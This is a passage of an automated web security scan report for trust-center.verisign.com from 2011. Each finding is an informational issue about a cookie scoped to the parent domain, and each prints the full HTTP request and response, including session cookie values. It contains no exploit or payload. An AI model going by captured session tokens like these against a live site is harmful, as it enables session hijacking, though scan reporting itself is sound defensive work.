HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: Apache Set-Cookie: TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 344 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif
9.49. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/pricebox_bg.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/pricebox_bg.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: Apache Set-Cookie: TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 13169 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif
9.50. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/sm_004276_oo.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/sm_004276_oo.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: Apache Set-Cookie: TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 597 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif
9.51. https://trust-center.verisign.com/rcm/verisign/images/truste.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/truste.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/truste.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: Apache Set-Cookie: TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 2232 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif
9.52. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/tsTermArrow.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermArrow.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: Apache Set-Cookie: TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 71 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif
9.53. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/tsTermBgM.jpg
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermBgM.jpg HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: Apache Set-Cookie: TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:07 GMT Accept-Ranges: bytes Content-Length: 956 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/jpeg
9.54. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/tsTermWtB.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermWtB.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: Apache Set-Cookie: TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 978 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif
9.55. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/tsTermWtT.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermWtT.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: Apache Set-Cookie: TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 997 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif
9.56. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/tsTermWtT.jpg
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermWtT.jpg HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: Apache Set-Cookie: TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:07 GMT Accept-Ranges: bytes Content-Length: 876 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/jpeg
9.57. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/webtrust.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/webtrust.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: Apache Set-Cookie: TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 2221 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif
9.58. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/account_signin.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/account_signin.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: Apache Set-Cookie: TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 741 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function lost_password(formName,referrerPath,username){var form=document.forms[formName];var usernameObj=getElement(username);form.action="/process/retail/account_lost_password?username="+escape(user...[SNIP]...
9.59. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/chat_support.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/chat_support.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: Apache Set-Cookie: TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 423 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function agents_available(onclickLink,imgLink){var sb=document.getElementById('smartbutton');if(sb){sb.innerHTML='<A HREF="" onClick="window.open(\''+onclickLink+'\',\'custclient\',\'width=500,height...[SNIP]...
9.60. https://trust-center.verisign.com/rcm/verisign/scripts/default.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/default.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/default.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: Apache Set-Cookie: TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 2794 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function initGoogleAnalytics(){_uacct="UA-230424-1";urchinTracker();} function clearButtonSubmits(){if(document.forms){for(var i=0,l=document.forms.length;i<l;i++){if(document.forms[i].button_back){d...[SNIP]...
9.61. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/oo_conf_en-US_inline.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/oo_conf_en-US_inline.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; 